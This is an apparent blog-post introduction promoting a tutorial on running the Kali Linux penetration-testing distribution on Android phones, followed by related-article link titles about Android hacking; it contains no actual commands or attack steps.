How to Install and run Kali Linux in Any Android Mobile You Like Hacking and want some amazing hacking tools for your android phone. Running Kali Linux in Android Mobile turn your android mobile into a hacking virtual PC box machine. Here we give you the detailed tutorial for How to install and run Kali Linux in your Android Mobile. If you know something about hacking or pentesting, you must need to know about this best hacking Linux OS. How to Install and run Kali Linux on your Android Mobile How to Install and run Kali Linux on your Android Mobile Kali Linux is most advanced penetration testing Linux distribution for testing system and network vulnerabilities. Basically, this OS is used by Ethical Hackers and security researchers worldwide. How to Install and run Kali Linux in Any Android Mobile CLICK TO TWEET Also Read: Install BackTrack on Android Mobile 50 Things You Didn’t Know Your Android Could Do Hack WiFi Network and Crack WiFi Password from Android Mobile Must Have WiF